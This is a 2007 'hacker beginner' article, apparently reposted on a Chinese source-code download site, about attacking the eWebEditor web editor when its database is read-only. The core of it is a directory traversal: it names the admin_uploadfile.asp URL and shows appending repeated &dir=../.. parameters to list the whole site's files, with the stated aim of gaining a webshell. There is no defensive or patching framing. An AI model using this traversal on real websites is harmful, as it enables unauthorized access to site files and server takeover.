首 页
┆
源码下载
┆
IT学院
┆
字体下载
┆
模板下载
┆
源码发布
┆
广告合作
┆
网站地图
►
设为首页
►
加入收藏
►
联系我们
源码下载
>>
ASP源码
|
PHP源码
|
ASP.net源码
|
JSP源码
|
CGI源码
|
VC/C++源码
|
VB源码
|
Delphi源码
|
Flash源码
文章学院
>>
网络编程
|
网页设计
|
图形图象
|
数据库
|
服务器
|
网络媒体
|
网络安全
|
操作系统
|
办公软件
|
软件开发
|
黑客知识
字体下载
>>
精制字体
|
非英字体
|
艺术字体
|
著名字体
|
哥特式
|
简单字体
|
手写体
|
节假日
|
图案字体
|
精度像素
|
中文字体
模板下载
>>
企业门户
|
数码网络
|
休闲娱乐
|
影视音乐
|
旅游名胜
|
文化艺术
|
电子商务
|
个性展示
|
登陆导航
|
Flash模板
源码搜索
文章搜索
字体搜索
模板搜索
►►
您当前的位置:
源码园
→
IT学院
→
黑客知识
→
黑客入门
→ 文章内容
当Ewebeditor数据库为只读时..--Ewebeditor,数据库,为只读时
作者:佚名 来源:网上收集 发布时间:2007-7-4 0:10:05
版本的ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限. 能看不能动
好在webeditor后台有个小小的缺陷. 可以历遍整个网站目录哦. 当然.数据库为只读的时候一样可以利用.
for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
当然 能不能拿到shell 具体问题具体解决..
[] [
返回上一页
] [
打 印
]
上一篇文章:
Penetration Testing 渗透测试--Penetration Testing,渗透测试
下一篇文章:
电信禁止ADSL路由器上网的破解方法--电信,禁止,ADSL,路由器上网,破解方法,路由器
相关文章:
当Ewebeditor数据库为只读时..--Ewebeditor,数据库,...
关于本站
-
网站帮助
-
广告合作
-
下载声明
-
友情连接
-
网站地图
-
源码发布
Copyright © 2003-2009
Ymyasp
.Com
. All Rights Reserved .
备案序号:粤ICP备07029071号
